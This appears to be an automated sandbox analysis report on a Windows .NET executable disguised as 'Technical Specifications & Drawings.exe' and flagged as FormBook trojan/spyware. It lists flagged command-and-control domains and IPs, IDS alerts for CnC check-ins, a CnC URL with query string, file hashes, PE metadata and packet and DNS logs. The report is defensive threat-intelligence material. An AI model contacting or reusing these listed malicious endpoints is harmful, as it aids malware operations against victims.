                            http://www.apache.org/licenses/LICENSE-2.0Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.tiro.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.goodfont.co.krTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comTechnical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                109.234.162.62
                                                		tomoptique.frFrance
                                                		50474O2SWITCHFRtrue
                                                107.155.208.43
                                                		www.kirchhoff-darryl.comUnited States
                                                		4686BEKKOAMEBEKKOAMEINTERNETINCJPtrue
                                                67.223.117.72
                                                		www.esandcraic.comUnited States
                                                		15189VIMRO-AS15189UStrue
                                                184.168.107.80
                                                		mexc-event-partner.siteUnited States
                                                		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                67.23.226.119
                                                		boshi-eg.onlineUnited States
                                                		33182DIMENOCUStrue

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680337
                                                Start date and time: 08/08/202212:26:092022-08-08 12:26:09 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Technical Specifications & Drawings.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@4/2@14/6
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 93.3% (good quality ratio 81.7%)
                                                • Quality average: 72%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                12:27:15API Interceptor1x Sleep call for process: Technical Specifications & Drawings.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Temp\207G7-97P

                                                Download File
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.774223579181345
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Technical Specifications & Drawings.exe
                                                File size:800256
                                                MD5:9b94f751e8cc145058db9f428c2ad571
                                                SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
                                                SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
                                                SHA512:02660cedcbf7d4a6d075eaa8bbd79bd560fc88ae1bbe5032348240f499432294f9c889b55f96e5f2e4214b7fe838df647a0cf4afefe2778b831af0d7dfd4e3dd
                                                SSDEEP:24576:hFxgV10E4B8aMrhPemfzId4MaZAOzje9IbUDHDl:tgVWES8z04eOzj7U
                                                TLSH:1805BE0BAF147708C5A76AB5EE0BBD76A7F61C5D3135D0B83A617C0A4AFF301E51242A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..b..............0..............L... ...`....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4c4cea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0AC40 [Mon Aug 8 06:25:04 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc4c980x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x390.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc2cf00xc2e00False0.8121780287844772data7.780783068719605IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc60000x3900x400False0.369140625data2.8640931166907952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc80000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xc60580x334data

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.367.23.226.11949803802031412 08/08/22-12:28:44.161490TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119
                                                192.168.2.367.23.226.11949803802031453 08/08/22-12:28:44.161490TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119
                                                192.168.2.367.223.117.7249809802031449 08/08/22-12:28:49.631208TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.223.117.7249809802031412 08/08/22-12:28:49.631208TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.223.117.7249809802031453 08/08/22-12:28:49.631208TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.23.226.11949803802031449 08/08/22-12:28:44.161490TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 12:28:32.463253975 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:32.755367041 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:32.755527020 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:32.786432028 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.078504086 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.078955889 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.078989983 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.079127073 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.302218914 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.595402002 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:38.335200071 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.365019083 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.365221024 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.365463018 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.395041943 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864422083 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864464045 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864614010 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.864650965 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.894378901 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:44.019023895 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.154835939 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.157953978 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.161489964 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.297408104 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300245047 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300311089 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300527096 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.300573111 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.436374903 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:49.458475113 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.628911018 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.631028891 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.631207943 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.801218033 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902386904 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902443886 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902481079 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902518988 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902545929 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902592897 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.902663946 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:51.640513897 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:51.810667992 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:29:01.721714973 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.971877098 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:01.972079039 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972229004 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972253084 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972655058 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.222067118 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.227452040 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.227598906 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.227710009 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.232486010 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.232532978 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.232578039 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.232604027 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.482373953 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489057064 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489123106 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489309072 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.489403963 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.744102001 CEST8049818184.168.107.80192.168.2.3

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 12:28:32.168889046 CEST5298553192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:32.449382067 CEST53529858.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:38.314755917 CEST5281053192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:38.334137917 CEST53528108.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:43.877885103 CEST5515153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:44.018109083 CEST53551518.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:49.332912922 CEST6481653192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:49.456350088 CEST53648168.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:01.681569099 CEST4972353192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:01.719481945 CEST53497238.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:07.523072958 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:08.532000065 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:09.578977108 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:11.663458109 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:12.542298079 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:12.571427107 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:13.551590919 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:13.579313993 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:14.594968081 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:14.598031998 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:16.610747099 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:16.682765961 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:17.592346907 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:18.598768950 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:19.614202976 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:21.629395008 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:22.596843958 CEST5663953192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:22.630506992 CEST53566398.8.8.8192.168.2.3

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Aug 8, 2022 12:29:13.551677942 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:14.598773003 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:16.682864904 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:18.598884106 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:19.614459038 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:21.629515886 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 12:28:32.168889046 CEST192.168.2.38.8.8.80x260eStandard query (0)www.kirchhoff-darryl.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:38.314755917 CEST192.168.2.38.8.8.80x93aeStandard query (0)www.tomoptique.frA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:43.877885103 CEST192.168.2.38.8.8.80xd4b1Standard query (0)www.boshi-eg.onlineA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:49.332912922 CEST192.168.2.38.8.8.80x603Standard query (0)www.esandcraic.comA (IP address)IN (0x0001)
